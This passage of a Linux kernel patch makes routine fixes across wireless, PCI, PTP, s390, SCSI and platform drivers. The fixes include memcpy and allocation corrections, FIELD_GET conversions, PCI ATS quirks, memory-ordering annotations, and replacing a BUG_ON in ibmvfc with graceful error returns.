+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -3021,7 +3021,7 @@ static void mac80211_hwsim_get_et_strings(struct ieee80211_hw *hw,
+ 					  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *mac80211_hwsim_gstrings_stats,
++		memcpy(data, mac80211_hwsim_gstrings_stats,
+ 		       sizeof(mac80211_hwsim_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/wlan.c b/drivers/net/wireless/microchip/wilc1000/wlan.c
+index 58bbf50081e47..9eb115c79c90a 100644
+--- a/drivers/net/wireless/microchip/wilc1000/wlan.c
++++ b/drivers/net/wireless/microchip/wilc1000/wlan.c
+@@ -1492,7 +1492,7 @@ int wilc_wlan_init(struct net_device *dev)
+ 	}
+ 
+ 	if (!wilc->vmm_table)
+-		wilc->vmm_table = kzalloc(WILC_VMM_TBL_SIZE, GFP_KERNEL);
++		wilc->vmm_table = kcalloc(WILC_VMM_TBL_SIZE, sizeof(u32), GFP_KERNEL);
+ 
+ 	if (!wilc->vmm_table) {
+ 		ret = -ENOBUFS;
+diff --git a/drivers/net/wireless/purelifi/plfxlc/mac.c b/drivers/net/wireless/purelifi/plfxlc/mac.c
+index d3cdffbded693..87a4ff888ddd4 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/mac.c
++++ b/drivers/net/wireless/purelifi/plfxlc/mac.c
+@@ -666,7 +666,7 @@ static void plfxlc_get_et_strings(struct ieee80211_hw *hw,
+ 				  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *et_strings, sizeof(et_strings));
++		memcpy(data, et_strings, sizeof(et_strings));
+ }
+ 
+ static void plfxlc_get_et_stats(struct ieee80211_hw *hw,
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 6f5e5f0230d39..332bcc0053a5e 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -197,6 +197,14 @@ static struct notifier_block parisc_panic_block = {
+ 	.priority	= INT_MAX,
+ };
+ 
++/* qemu soft power-off function */
++static int qemu_power_off(struct sys_off_data *data)
++{
++	/* this turns the system off via SeaBIOS */
++	gsc_writel(0, (unsigned long) data->cb_data);
++	pdc_soft_power_button(1);
++	return NOTIFY_DONE;
++}
+ 
+ static int __init power_init(void)
+ {
+@@ -226,7 +234,13 @@ static int __init power_init(void)
+ 				soft_power_reg);
+ 	}
+ 
+-	power_task = kthread_run(kpowerswd, (void*)soft_power_reg, KTHREAD_NAME);
++	power_task = NULL;
++	if (running_on_qemu && soft_power_reg)
++		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF, SYS_OFF_PRIO_DEFAULT,
++					qemu_power_off, (void *)soft_power_reg);
++	else
++		power_task = kthread_run(kpowerswd, (void*)soft_power_reg,
++					KTHREAD_NAME);
+ 	if (IS_ERR(power_task)) {
+ 		printk(KERN_ERR DRIVER_NAME ": thread creation failed.  Driver not loaded.\n");
+ 		pdc_soft_power_button(0);
+diff --git a/drivers/pci/controller/dwc/pci-exynos.c b/drivers/pci/controller/dwc/pci-exynos.c
+index ec56110055665..e5519978ba475 100644
+--- a/drivers/pci/controller/dwc/pci-exynos.c
++++ b/drivers/pci/controller/dwc/pci-exynos.c
+@@ -375,7 +375,7 @@ fail_probe:
+ 	return ret;
+ }
+ 
+-static int __exit exynos_pcie_remove(struct platform_device *pdev)
++static int exynos_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct exynos_pcie *ep = platform_get_drvdata(pdev);
+ 
+@@ -431,7 +431,7 @@ static const struct of_device_id exynos_pcie_of_match[] = {
+ 
+ static struct platform_driver exynos_pcie_driver = {
+ 	.probe		= exynos_pcie_probe,
+-	.remove		= __exit_p(exynos_pcie_remove),
++	.remove		= exynos_pcie_remove,
+ 	.driver = {
+ 		.name	= "exynos-pcie",
+ 		.of_match_table = exynos_pcie_of_match,
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 78818853af9e4..d2634dafb68e5 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -1101,7 +1101,7 @@ static const struct of_device_id ks_pcie_of_match[] = {
+ 	{ },
+ };
+ 
+-static int __init ks_pcie_probe(struct platform_device *pdev)
++static int ks_pcie_probe(struct platform_device *pdev)
+ {
+ 	const struct dw_pcie_host_ops *host_ops;
+ 	const struct dw_pcie_ep_ops *ep_ops;
+@@ -1303,7 +1303,7 @@ err_link:
+ 	return ret;
+ }
+ 
+-static int __exit ks_pcie_remove(struct platform_device *pdev)
++static int ks_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct keystone_pcie *ks_pcie = platform_get_drvdata(pdev);
+ 	struct device_link **link = ks_pcie->link;
+@@ -1319,9 +1319,9 @@ static int __exit ks_pcie_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct platform_driver ks_pcie_driver __refdata = {
++static struct platform_driver ks_pcie_driver = {
+ 	.probe  = ks_pcie_probe,
+-	.remove = __exit_p(ks_pcie_remove),
++	.remove = ks_pcie_remove,
+ 	.driver = {
+ 		.name	= "keystone-pcie",
+ 		.of_match_table = ks_pcie_of_match,
+diff --git a/drivers/pci/controller/dwc/pcie-kirin.c b/drivers/pci/controller/dwc/pcie-kirin.c
+index d09507f822a7d..a824d8e8edb9d 100644
+--- a/drivers/pci/controller/dwc/pcie-kirin.c
++++ b/drivers/pci/controller/dwc/pcie-kirin.c
+@@ -742,7 +742,7 @@ err:
+ 	return ret;
+ }
+ 
+-static int __exit kirin_pcie_remove(struct platform_device *pdev)
++static int kirin_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct kirin_pcie *kirin_pcie = platform_get_drvdata(pdev);
+ 
+@@ -819,7 +819,7 @@ static int kirin_pcie_probe(struct platform_device *pdev)
+ 
+ static struct platform_driver kirin_pcie_driver = {
+ 	.probe			= kirin_pcie_probe,
+-	.remove	        	= __exit_p(kirin_pcie_remove),
++	.remove	        	= kirin_pcie_remove,
+ 	.driver			= {
+ 		.name			= "kirin-pcie",
+ 		.of_match_table		= kirin_pcie_match,
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 2241029537a03..5d1ae2706f6ea 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -9,6 +9,7 @@
+  * Author: Vidya Sagar <vidyas@nvidia.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/debugfs.h>
+ #include <linux/delay.h>
+@@ -324,8 +325,7 @@ static void apply_bad_link_workaround(struct dw_pcie_rp *pp)
+ 	 */
+ 	val = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA);
+ 	if (val & PCI_EXP_LNKSTA_LBMS) {
+-		current_link_width = (val & PCI_EXP_LNKSTA_NLW) >>
+-				     PCI_EXP_LNKSTA_NLW_SHIFT;
++		current_link_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, val);
+ 		if (pcie->init_link_width > current_link_width) {
+ 			dev_warn(pci->dev, "PCIe link is bad, width reduced\n");
+ 			val = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base +
+@@ -740,8 +740,7 @@ static void tegra_pcie_enable_system_interrupts(struct dw_pcie_rp *pp)
+ 
+ 	val_w = dw_pcie_readw_dbi(&pcie->pci, pcie->pcie_cap_base +
+ 				  PCI_EXP_LNKSTA);
+-	pcie->init_link_width = (val_w & PCI_EXP_LNKSTA_NLW) >>
+-				PCI_EXP_LNKSTA_NLW_SHIFT;
++	pcie->init_link_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, val_w);
+ 
+ 	val_w = dw_pcie_readw_dbi(&pcie->pci, pcie->pcie_cap_base +
+ 				  PCI_EXP_LNKCTL);
+@@ -900,7 +899,7 @@ static int tegra_pcie_dw_host_init(struct dw_pcie_rp *pp)
+ 	/* Configure Max lane width from DT */
+ 	val = dw_pcie_readl_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKCAP);
+ 	val &= ~PCI_EXP_LNKCAP_MLW;
+-	val |= (pcie->num_lanes << PCI_EXP_LNKSTA_NLW_SHIFT);
++	val |= FIELD_PREP(PCI_EXP_LNKCAP_MLW, pcie->num_lanes);
+ 	dw_pcie_writel_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKCAP, val);
+ 
+ 	/* Clear Slot Clock Configuration bit if SRNS configuration */
+diff --git a/drivers/pci/controller/pci-mvebu.c b/drivers/pci/controller/pci-mvebu.c
+index 1ced73726a267..668601fd0b296 100644
+--- a/drivers/pci/controller/pci-mvebu.c
++++ b/drivers/pci/controller/pci-mvebu.c
+@@ -264,7 +264,7 @@ static void mvebu_pcie_setup_hw(struct mvebu_pcie_port *port)
+ 	 */
+ 	lnkcap = mvebu_readl(port, PCIE_CAP_PCIEXP + PCI_EXP_LNKCAP);
+ 	lnkcap &= ~PCI_EXP_LNKCAP_MLW;
+-	lnkcap |= (port->is_x4 ? 4 : 1) << 4;
++	lnkcap |= FIELD_PREP(PCI_EXP_LNKCAP_MLW, port->is_x4 ? 4 : 1);
+ 	mvebu_writel(port, lnkcap, PCIE_CAP_PCIEXP + PCI_EXP_LNKCAP);
+ 
+ 	/* Disable Root Bridge I/O space, memory space and bus mastering. */
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 7aa1c20582ab8..2f5eddf03ac6a 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -911,7 +911,7 @@ pci_power_t acpi_pci_choose_state(struct pci_dev *pdev)
+ {
+ 	int acpi_state, d_max;
+ 
+-	if (pdev->no_d3cold)
++	if (pdev->no_d3cold || !pdev->d3cold_allowed)
+ 		d_max = ACPI_STATE_D3_HOT;
+ 	else
+ 		d_max = ACPI_STATE_D3_COLD;
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index dd0d9d9bc5097..df1c44a5c886c 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -12,7 +12,7 @@
+  * Modeled after usb's driverfs.c
+  */
+ 
+-
++#include <linux/bitfield.h>
+ #include <linux/kernel.h>
+ #include <linux/sched.h>
+ #include <linux/pci.h>
+@@ -230,8 +230,7 @@ static ssize_t current_link_width_show(struct device *dev,
+ 	if (err)
+ 		return -EINVAL;
+ 
+-	return sysfs_emit(buf, "%u\n",
+-		(linkstat & PCI_EXP_LNKSTA_NLW) >> PCI_EXP_LNKSTA_NLW_SHIFT);
++	return sysfs_emit(buf, "%u\n", FIELD_GET(PCI_EXP_LNKSTA_NLW, linkstat));
+ }
+ static DEVICE_ATTR_RO(current_link_width);
+ 
+@@ -530,10 +529,7 @@ static ssize_t d3cold_allowed_store(struct device *dev,
+ 		return -EINVAL;
+ 
+ 	pdev->d3cold_allowed = !!val;
+-	if (pdev->d3cold_allowed)
+-		pci_d3cold_enable(pdev);
+-	else
+-		pci_d3cold_disable(pdev);
++	pci_bridge_d3_update(pdev);
+ 
+ 	pm_runtime_resume(dev);
+ 
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 835e9ea14b3a1..8df156c28aade 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -717,15 +717,18 @@ u16 pci_find_vsec_capability(struct pci_dev *dev, u16 vendor, int cap)
+ {
+ 	u16 vsec = 0;
+ 	u32 header;
++	int ret;
+ 
+ 	if (vendor != dev->vendor)
+ 		return 0;
+ 
+ 	while ((vsec = pci_find_next_ext_capability(dev, vsec,
+ 						     PCI_EXT_CAP_ID_VNDR))) {
+-		if (pci_read_config_dword(dev, vsec + PCI_VNDR_HEADER,
+-					  &header) == PCIBIOS_SUCCESSFUL &&
+-		    PCI_VNDR_HEADER_ID(header) == cap)
++		ret = pci_read_config_dword(dev, vsec + PCI_VNDR_HEADER, &header);
++		if (ret != PCIBIOS_SUCCESSFUL)
++			continue;
++
++		if (PCI_VNDR_HEADER_ID(header) == cap)
+ 			return vsec;
+ 	}
+ 
+@@ -3710,14 +3713,14 @@ u32 pci_rebar_get_possible_sizes(struct pci_dev *pdev, int bar)
+ 		return 0;
+ 
+ 	pci_read_config_dword(pdev, pos + PCI_REBAR_CAP, &cap);
+-	cap &= PCI_REBAR_CAP_SIZES;
++	cap = FIELD_GET(PCI_REBAR_CAP_SIZES, cap);
+ 
+ 	/* Sapphire RX 5600 XT Pulse has an invalid cap dword for BAR 0 */
+ 	if (pdev->vendor == PCI_VENDOR_ID_ATI && pdev->device == 0x731f &&
+-	    bar == 0 && cap == 0x7000)
+-		cap = 0x3f000;
++	    bar == 0 && cap == 0x700)
++		return 0x3f00;
+ 
+-	return cap >> 4;
++	return cap;
+ }
+ EXPORT_SYMBOL(pci_rebar_get_possible_sizes);
+ 
+@@ -6135,8 +6138,7 @@ u32 pcie_bandwidth_available(struct pci_dev *dev, struct pci_dev **limiting_dev,
+ 		pcie_capability_read_word(dev, PCI_EXP_LNKSTA, &lnksta);
+ 
+ 		next_speed = pcie_link_speed[lnksta & PCI_EXP_LNKSTA_CLS];
+-		next_width = (lnksta & PCI_EXP_LNKSTA_NLW) >>
+-			PCI_EXP_LNKSTA_NLW_SHIFT;
++		next_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, lnksta);
+ 
+ 		next_bw = next_width * PCIE_SPEED2MBS_ENC(next_speed);
+ 
+@@ -6208,7 +6210,7 @@ enum pcie_link_width pcie_get_width_cap(struct pci_dev *dev)
+ 
+ 	pcie_capability_read_dword(dev, PCI_EXP_LNKCAP, &lnkcap);
+ 	if (lnkcap)
+-		return (lnkcap & PCI_EXP_LNKCAP_MLW) >> 4;
++		return FIELD_GET(PCI_EXP_LNKCAP_MLW, lnkcap);
+ 
+ 	return PCIE_LNK_WIDTH_UNKNOWN;
+ }
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 7e89cdbd446fc..5d1756f53ba84 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1248,6 +1248,8 @@ static ssize_t aspm_attr_store_common(struct device *dev,
+ 			link->aspm_disable &= ~ASPM_STATE_L1;
+ 	} else {
+ 		link->aspm_disable |= state;
++		if (state & ASPM_STATE_L1)
++			link->aspm_disable |= ASPM_STATE_L1SS;
+ 	}
+ 
+ 	pcie_config_aspm_link(link, policy_to_aspm_state(link));
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 0945f50fe94ff..e19b79821dd6d 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -1643,15 +1643,15 @@ static void pci_set_removable(struct pci_dev *dev)
+ static bool pci_ext_cfg_is_aliased(struct pci_dev *dev)
+ {
+ #ifdef CONFIG_PCI_QUIRKS
+-	int pos;
++	int pos, ret;
+ 	u32 header, tmp;
+ 
+ 	pci_read_config_dword(dev, PCI_VENDOR_ID, &header);
+ 
+ 	for (pos = PCI_CFG_SPACE_SIZE;
+ 	     pos < PCI_CFG_SPACE_EXP_SIZE; pos += PCI_CFG_SPACE_SIZE) {
+-		if (pci_read_config_dword(dev, pos, &tmp) != PCIBIOS_SUCCESSFUL
+-		    || header != tmp)
++		ret = pci_read_config_dword(dev, pos, &tmp);
++		if ((ret != PCIBIOS_SUCCESSFUL) || (header != tmp))
+ 			return false;
+ 	}
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 30e7c627f21a7..48389785d9247 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5288,7 +5288,7 @@ int pci_dev_specific_disable_acs_redir(struct pci_dev *dev)
+  */
+ static void quirk_intel_qat_vf_cap(struct pci_dev *pdev)
+ {
+-	int pos, i = 0;
++	int pos, i = 0, ret;
+ 	u8 next_cap;
+ 	u16 reg16, *cap;
+ 	struct pci_cap_saved_state *state;
+@@ -5334,8 +5334,8 @@ static void quirk_intel_qat_vf_cap(struct pci_dev *pdev)
+ 		pdev->pcie_mpss = reg16 & PCI_EXP_DEVCAP_PAYLOAD;
+ 
+ 		pdev->cfg_size = PCI_CFG_SPACE_EXP_SIZE;
+-		if (pci_read_config_dword(pdev, PCI_CFG_SPACE_SIZE, &status) !=
+-		    PCIBIOS_SUCCESSFUL || (status == 0xffffffff))
++		ret = pci_read_config_dword(pdev, PCI_CFG_SPACE_SIZE, &status);
++		if ((ret != PCIBIOS_SUCCESSFUL) || (PCI_POSSIBLE_ERROR(status)))
+ 			pdev->cfg_size = PCI_CFG_SPACE_SIZE;
+ 
+ 		if (pci_find_saved_cap(pdev, PCI_CAP_ID_EXP))
+@@ -5404,6 +5404,12 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0420, quirk_no_ext_tags);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SERVERWORKS, 0x0422, quirk_no_ext_tags);
+ 
+ #ifdef CONFIG_PCI_ATS
++static void quirk_no_ats(struct pci_dev *pdev)
++{
++	pci_info(pdev, "disabling ATS\n");
++	pdev->ats_cap = 0;
++}
++
+ /*
+  * Some devices require additional driver setup to enable ATS.  Don't use
+  * ATS for those devices as ATS will be enabled before the driver has had a
+@@ -5417,14 +5423,10 @@ static void quirk_amd_harvest_no_ats(struct pci_dev *pdev)
+ 		    (pdev->subsystem_device == 0xce19 ||
+ 		     pdev->subsystem_device == 0xcc10 ||
+ 		     pdev->subsystem_device == 0xcc08))
+-			goto no_ats;
+-		else
+-			return;
++			quirk_no_ats(pdev);
++	} else {
++		quirk_no_ats(pdev);
+ 	}
+-
+-no_ats:
+-	pci_info(pdev, "disabling ATS\n");
+-	pdev->ats_cap = 0;
+ }
+ 
+ /* AMD Stoney platform GPU */
+@@ -5447,6 +5449,25 @@ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7347, quirk_amd_harvest_no_ats);
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x734f, quirk_amd_harvest_no_ats);
+ /* AMD Raven platform iGPU */
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x15d8, quirk_amd_harvest_no_ats);
++
++/*
++ * Intel IPU E2000 revisions before C0 implement incorrect endianness
++ * in ATS Invalidate Request message body. Disable ATS for those devices.
++ */
++static void quirk_intel_e2000_no_ats(struct pci_dev *pdev)
++{
++	if (pdev->revision < 0x20)
++		quirk_no_ats(pdev);
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1451, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1452, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1453, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1454, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1455, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1457, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x1459, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x145a, quirk_intel_e2000_no_ats);
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x145c, quirk_intel_e2000_no_ats);
+ #endif /* CONFIG_PCI_ATS */
+ 
+ /* Freescale PCIe doesn't support MSI in RC mode */
+diff --git a/drivers/platform/chrome/cros_ec_proto_test.c b/drivers/platform/chrome/cros_ec_proto_test.c
+index c6a83df91ae1e..b46a8bc2196fe 100644
+--- a/drivers/platform/chrome/cros_ec_proto_test.c
++++ b/drivers/platform/chrome/cros_ec_proto_test.c
+@@ -2667,6 +2667,7 @@ static int cros_ec_proto_test_init(struct kunit *test)
+ 	ec_dev->dev->release = cros_ec_proto_test_release;
+ 	ec_dev->cmd_xfer = cros_kunit_ec_xfer_mock;
+ 	ec_dev->pkt_xfer = cros_kunit_ec_xfer_mock;
++	mutex_init(&ec_dev->lock);
+ 
+ 	priv->msg = (struct cros_ec_command *)priv->_msg;
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 3bb60687f2e42..05a55bc31c796 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10019,6 +10019,7 @@ static const struct tpacpi_quirk battery_quirk_table[] __initconst = {
+ 	 * Individual addressing is broken on models that expose the
+ 	 * primary battery as BAT1.
+ 	 */
++	TPACPI_Q_LNV('8', 'F', true),       /* Thinkpad X120e */
+ 	TPACPI_Q_LNV('J', '7', true),       /* B5400 */
+ 	TPACPI_Q_LNV('J', 'I', true),       /* Thinkpad 11e */
+ 	TPACPI_Q_LNV3('R', '0', 'B', true), /* Thinkpad 11e gen 3 */
+diff --git a/drivers/ptp/ptp_chardev.c b/drivers/ptp/ptp_chardev.c
+index af3bc65c4595d..9311f3d09c8fc 100644
+--- a/drivers/ptp/ptp_chardev.c
++++ b/drivers/ptp/ptp_chardev.c
+@@ -487,7 +487,8 @@ ssize_t ptp_read(struct posix_clock *pc,
+ 
+ 	for (i = 0; i < cnt; i++) {
+ 		event[i] = queue->buf[queue->head];
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		/* Paired with READ_ONCE() in queue_cnt() */
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+diff --git a/drivers/ptp/ptp_clock.c b/drivers/ptp/ptp_clock.c
+index 51cae72bb6db2..3c3e4fbefebaf 100644
+--- a/drivers/ptp/ptp_clock.c
++++ b/drivers/ptp/ptp_clock.c
+@@ -56,10 +56,11 @@ static void enqueue_external_timestamp(struct timestamp_event_queue *queue,
+ 	dst->t.sec = seconds;
+ 	dst->t.nsec = remainder;
+ 
++	/* Both WRITE_ONCE() are paired with READ_ONCE() in queue_cnt() */
+ 	if (!queue_free(queue))
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 
+-	queue->tail = (queue->tail + 1) % PTP_MAX_TIMESTAMPS;
++	WRITE_ONCE(queue->tail, (queue->tail + 1) % PTP_MAX_TIMESTAMPS);
+ 
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+ }
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 75f58fc468a71..b8d4f61f14be4 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -76,9 +76,13 @@ struct ptp_vclock {
+  * that a writer might concurrently increment the tail does not
+  * matter, since the queue remains nonempty nonetheless.
+  */
+-static inline int queue_cnt(struct timestamp_event_queue *q)
++static inline int queue_cnt(const struct timestamp_event_queue *q)
+ {
+-	int cnt = q->tail - q->head;
++	/*
++	 * Paired with WRITE_ONCE() in enqueue_external_timestamp(),
++	 * ptp_read(), extts_fifo_show().
++	 */
++	int cnt = READ_ONCE(q->tail) - READ_ONCE(q->head);
+ 	return cnt < 0 ? PTP_MAX_TIMESTAMPS + cnt : cnt;
+ }
+ 
+diff --git a/drivers/ptp/ptp_sysfs.c b/drivers/ptp/ptp_sysfs.c
+index f30b0a4394705..74b9c794d6363 100644
+--- a/drivers/ptp/ptp_sysfs.c
++++ b/drivers/ptp/ptp_sysfs.c
+@@ -79,7 +79,8 @@ static ssize_t extts_fifo_show(struct device *dev,
+ 	qcnt = queue_cnt(queue);
+ 	if (qcnt) {
+ 		event = queue->buf[queue->head];
+-		queue->head = (queue->head + 1) % PTP_MAX_TIMESTAMPS;
++		/* Paired with READ_ONCE() in queue_cnt() */
++		WRITE_ONCE(queue->head, (queue->head + 1) % PTP_MAX_TIMESTAMPS);
+ 	}
+ 	spin_unlock_irqrestore(&queue->lock, flags);
+ 
+diff --git a/drivers/s390/crypto/ap_bus.c b/drivers/s390/crypto/ap_bus.c
+index b02c631f3b71a..4c0f9fe1ba779 100644
+--- a/drivers/s390/crypto/ap_bus.c
++++ b/drivers/s390/crypto/ap_bus.c
+@@ -1012,6 +1012,10 @@ EXPORT_SYMBOL(ap_driver_unregister);
+ 
+ void ap_bus_force_rescan(void)
+ {
++	/* Only trigger AP bus scans after the initial scan is done */
++	if (atomic64_read(&ap_scan_bus_count) <= 0)
++		return;
++
+ 	/* processing a asynchronous bus rescan */
+ 	del_timer(&ap_config_timer);
+ 	queue_work(system_long_wq, &ap_scan_work);
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index c0e74d768716d..c4305ec38ebf3 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -4717,6 +4717,12 @@ static void debugfs_bist_init_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->debugfs_bist_linkrate = SAS_LINK_RATE_1_5_GBPS;
+ }
+ 
++static void debugfs_exit_v3_hw(struct hisi_hba *hisi_hba)
++{
++	debugfs_remove_recursive(hisi_hba->debugfs_dir);
++	hisi_hba->debugfs_dir = NULL;
++}
++
+ static void debugfs_init_v3_hw(struct hisi_hba *hisi_hba)
+ {
+ 	struct device *dev = hisi_hba->dev;
+@@ -4740,18 +4746,13 @@ static void debugfs_init_v3_hw(struct hisi_hba *hisi_hba)
+ 
+ 	for (i = 0; i < hisi_sas_debugfs_dump_count; i++) {
+ 		if (debugfs_alloc_v3_hw(hisi_hba, i)) {
+-			debugfs_remove_recursive(hisi_hba->debugfs_dir);
++			debugfs_exit_v3_hw(hisi_hba);
+ 			dev_dbg(dev, "failed to init debugfs!\n");
+ 			break;
+ 		}
+ 	}
+ }
+ 
+-static void debugfs_exit_v3_hw(struct hisi_hba *hisi_hba)
+-{
+-	debugfs_remove_recursive(hisi_hba->debugfs_dir);
+-}
+-
+ static int
+ hisi_sas_v3_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
+index 41148b0430df9..013f5c05e9f39 100644
+--- a/drivers/scsi/ibmvscsi/ibmvfc.c
++++ b/drivers/scsi/ibmvscsi/ibmvfc.c
+@@ -1518,7 +1518,11 @@ static struct ibmvfc_event *ibmvfc_get_event(struct ibmvfc_queue *queue)
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&queue->l_lock, flags);
+-	BUG_ON(list_empty(&queue->free));
++	if (list_empty(&queue->free)) {
++		ibmvfc_log(queue->vhost, 4, "empty event pool on queue:%ld\n", queue->hwq_id);
++		spin_unlock_irqrestore(&queue->l_lock, flags);
++		return NULL;
++	}
+ 	evt = list_entry(queue->free.next, struct ibmvfc_event, queue_list);
+ 	atomic_set(&evt->free, 0);
+ 	list_del(&evt->queue_list);
+@@ -1947,9 +1951,15 @@ static int ibmvfc_queuecommand(struct Scsi_Host *shost, struct scsi_cmnd *cmnd)
+ 	if (vhost->using_channels) {
+ 		scsi_channel = hwq % vhost->scsi_scrqs.active_queues;
+ 		evt = ibmvfc_get_event(&vhost->scsi_scrqs.scrqs[scsi_channel]);
++		if (!evt)
++			return SCSI_MLQUEUE_HOST_BUSY;
++
+ 		evt->hwq = hwq % vhost->scsi_scrqs.active_queues;
+-	} else
++	} else {
+ 		evt = ibmvfc_get_event(&vhost->crq);
++		if (!evt)
++			return SCSI_MLQUEUE_HOST_BUSY;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_scsi_done, IBMVFC_CMD_FORMAT);
+ 	evt->cmnd = cmnd;
+@@ -2037,6 +2047,11 @@ static int ibmvfc_bsg_timeout(struct bsg_job *job)
+ 
+ 	vhost->aborting_passthru = 1;
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		return -ENOMEM;
++	}
++
+ 	ibmvfc_init_event(evt, ibmvfc_bsg_timeout_done, IBMVFC_MAD_FORMAT);
+ 
+ 	tmf = &evt->iu.tmf;
+@@ -2095,6 +2110,10 @@ static int ibmvfc_bsg_plogi(struct ibmvfc_host *vhost, unsigned int port_id)
+ 		goto unlock_out;
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		rc = -ENOMEM;
++		goto unlock_out;
++	}
+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 	plogi = &evt->iu.plogi;
+ 	memset(plogi, 0, sizeof(*plogi));
+@@ -2213,6 +2232,11 @@ static int ibmvfc_bsg_request(struct bsg_job *job)
+ 	}
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		rc = -ENOMEM;
++		goto out;
++	}
